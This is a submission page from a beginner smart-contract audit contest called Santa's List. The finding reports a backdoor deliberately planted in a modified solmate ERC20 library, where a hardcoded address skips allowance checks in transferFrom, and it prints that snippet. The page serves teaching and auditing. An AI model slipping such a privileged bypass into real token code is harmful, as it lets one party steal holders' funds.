First Flight #5: Santa's List
First Flight #5
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Steal SantaToken token from any addresses

Ryan

Summary

Malicious ERC20 library is used, giving permission for address 0x815F577F1c1bcE213c012f166744937C889DAF17 to modify SantaToken balance of any addresses

Vulnerability Details

SantaToken is using ERC20 library from "solmate-bad/src/tokens/ERC20.sol", which is a modified version of solmate ERC20. Malicious code is added into the TransferFrom function:

// hehehe :)
// https://arbiscan.io/tx/0xd0c8688c3bcabd0024c7a52dfd818f8eb656e9e8763d0177237d5beb70a0768d
if (msg.sender == 0x815F577F1c1bcE213c012f166744937C889DAF17) {
balanceOf[from] -= amount;
unchecked {
balanceOf[to] += amount;
}
emit Transfer(from, to, amount);
return true;
}

Impact

With this modification, address 0x815F577F1c1bcE213c012f166744937C889DAF17 can modify balance of any addresses, including stealing SantaToken from other addresses without giving allowance.

Tools Used

Foundry

Recommendations

Using original solmate library instead

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

unauthorized elf wallet approval in solmate-bad

Some sneaky elf has changed this library to a corrupted one where his wallet address skips all the approval checks for SantaToken! Shenanigans here - https://github.com/PatrickAlphaC/solmate-bad/blob/c3877e5571461c61293503f45fc00959fff4ebba/src/tokens/ERC20.sol#L88

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.